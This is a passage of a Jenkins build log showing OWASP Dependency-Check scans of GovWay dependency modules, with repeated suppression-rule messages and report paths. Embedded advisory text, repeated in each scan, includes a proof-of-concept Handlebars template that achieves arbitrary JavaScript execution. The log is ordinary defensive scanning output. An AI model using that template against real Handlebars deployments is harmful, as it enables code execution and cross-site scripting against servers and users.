caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:40:23 17:40:23 17:40:23 ## Recommendation 17:40:23 17:40:23 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:40:23 17:40:23 The following template can be used to demonstrate the vulnerability: 17:40:23 ```{{#with "constructor"}} 17:40:23 {{#with split as |a|}} 17:40:23 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:40:23 {{#with (concat (lookup join (slice 0 1)))}} 17:40:23 {{#each (slice 2 3)}} 17:40:23 {{#with (apply 0 a)}} 17:40:23 {{.}} 17:40:23 {{/with}} 17:40:23 {{/each}} 17:40:23 {{/with}} 17:40:23 {{/with}} 17:40:23 {{/with}}``` 17:40:23 17:40:23 17:40:23 ## Recommendation 17:40:23 17:40:23 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:40:23 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:40:23 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:40:23 [INFO] Analysis Complete (13 seconds) 17:40:23 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:40:23 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:40:23 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:40:23 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:40:23 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:40:23 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:40:24 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:40:24 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:40:24 [INFO] 17:40:24 [INFO] ----------------< org.openspcoop2:org.openspcoop2.git >----------------- 17:40:24 [INFO] Building dependencies.git 1.0 [10/67] 17:40:24 [INFO] from mvn/dependencies/git/pom.xml 17:40:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:40:24 [INFO] 17:40:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.git --- 17:40:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/git (includes = [*.jar], excludes = []) 17:40:24 [INFO] 17:40:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.git --- 17:40:24 [INFO] 17:40:24 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.git --- 17:40:24 [INFO] Executing tasks 17:40:29 [INFO] Executed tasks 17:40:29 [INFO] 17:40:29 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.git --- 17:40:29 [INFO] Checking for updates 17:40:29 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:40:29 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:40:29 [INFO] Check for updates complete (119 ms) 17:40:30 [INFO] 17:40:30 17:40:30 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:40:30 17:40:30 17:40:30 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:40:30 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:40:30 17:40:30 17:40:30 [INFO] Analysis Started 17:40:30 [INFO] Finished Archive Analyzer (0 seconds) 17:40:30 [INFO] Finished File Name Analyzer (0 seconds) 17:40:30 [INFO] Finished Jar Analyzer (0 seconds) 17:40:30 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:40:30 [INFO] Finished Hint Analyzer (0 seconds) 17:40:30 [INFO] Finished Version Filter Analyzer (0 seconds) 17:40:33 [INFO] Created CPE Index (2 seconds) 17:40:33 [INFO] Finished CPE Analyzer (2 seconds) 17:40:33 [INFO] Finished False Positive Analyzer (0 seconds) 17:40:33 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:40:33 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:40:33 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:40:33 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:40:33 17:40:33 17:40:33 ## Recommendation 17:40:33 17:40:33 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:40:33 17:40:33 The following template can be used to demonstrate the vulnerability: 17:40:33 ```{{#with "constructor"}} 17:40:33 {{#with split as |a|}} 17:40:33 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:40:33 {{#with (concat (lookup join (slice 0 1)))}} 17:40:33 {{#each (slice 2 3)}} 17:40:33 {{#with (apply 0 a)}} 17:40:33 {{.}} 17:40:33 {{/with}} 17:40:33 {{/each}} 17:40:33 {{/with}} 17:40:33 {{/with}} 17:40:33 {{/with}}``` 17:40:33 17:40:33 17:40:33 ## Recommendation 17:40:33 17:40:33 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:40:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:40:33 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:40:33 [INFO] Analysis Complete (3 seconds) 17:40:33 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:40:33 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:40:33 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:40:33 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:40:33 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:40:33 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:40:33 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:40:33 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:40:33 [INFO] 17:40:33 [INFO] --------------< org.openspcoop2:org.openspcoop2.httpcore >-------------- 17:40:33 [INFO] Building dependencies.httpcore 1.0 [11/67] 17:40:33 [INFO] from mvn/dependencies/httpcore/pom.xml 17:40:33 [INFO] --------------------------------[ pom ]--------------------------------- 17:40:33 [INFO] 17:40:33 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.httpcore --- 17:40:33 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/httpcore (includes = [*.jar], excludes = []) 17:40:33 [INFO] 17:40:33 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.httpcore --- 17:40:33 [INFO] 17:40:33 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.httpcore --- 17:40:33 [INFO] Executing tasks 17:40:38 [INFO] Executed tasks 17:40:38 [INFO] 17:40:38 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.httpcore --- 17:40:38 [INFO] Checking for updates 17:40:38 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:40:39 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:40:39 [INFO] Check for updates complete (69 ms) 17:40:39 [INFO] 17:40:39 17:40:39 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:40:39 17:40:39 17:40:39 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:40:39 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:40:39 17:40:39 17:40:39 [INFO] Analysis Started 17:40:39 [INFO] Finished Archive Analyzer (0 seconds) 17:40:39 [INFO] Finished File Name Analyzer (0 seconds) 17:40:39 [INFO] Finished Jar Analyzer (0 seconds) 17:40:39 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:40:39 [INFO] Finished Hint Analyzer (0 seconds) 17:40:39 [INFO] Finished Version Filter Analyzer (0 seconds) 17:40:40 [INFO] Created CPE Index (1 seconds) 17:40:40 [INFO] Finished CPE Analyzer (1 seconds) 17:40:40 [INFO] Finished False Positive Analyzer (0 seconds) 17:40:40 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:40:40 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:40:40 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:40:40 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:40:40 17:40:40 17:40:40 ## Recommendation 17:40:40 17:40:40 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:40:40 17:40:40 The following template can be used to demonstrate the vulnerability: 17:40:40 ```{{#with "constructor"}} 17:40:40 {{#with split as |a|}} 17:40:40 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:40:40 {{#with (concat (lookup join (slice 0 1)))}} 17:40:40 {{#each (slice 2 3)}} 17:40:40 {{#with (apply 0 a)}} 17:40:40 {{.}} 17:40:40 {{/with}} 17:40:40 {{/each}} 17:40:40 {{/with}} 17:40:40 {{/with}} 17:40:40 {{/with}}``` 17:40:40 17:40:40 17:40:40 ## Recommendation 17:40:40 17:40:40 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:40:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:40:40 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:40:40 [INFO] Analysis Complete (1 seconds) 17:40:40 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:40:40 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:40:40 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:40:40 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:40:40 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:40:40 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:40:40 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:40:40 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:40:40 [INFO] 17:40:40 [INFO] --------------< org.openspcoop2:org.openspcoop2.jackson >--------------- 17:40:40 [INFO] Building dependencies.jackson 1.0 [12/67] 17:40:40 [INFO] from mvn/dependencies/jackson/pom.xml 17:40:40 [INFO] --------------------------------[ pom ]--------------------------------- 17:40:40 [INFO] 17:40:40 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jackson --- 17:40:40 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jackson (includes = [*.jar], excludes = []) 17:40:40 [INFO] 17:40:40 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jackson --- 17:40:41 [INFO] 17:40:41 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.jackson --- 17:40:41 [INFO] Executing tasks 17:40:46 [INFO] Executed tasks 17:40:46 [INFO] 17:40:46 [INFO] 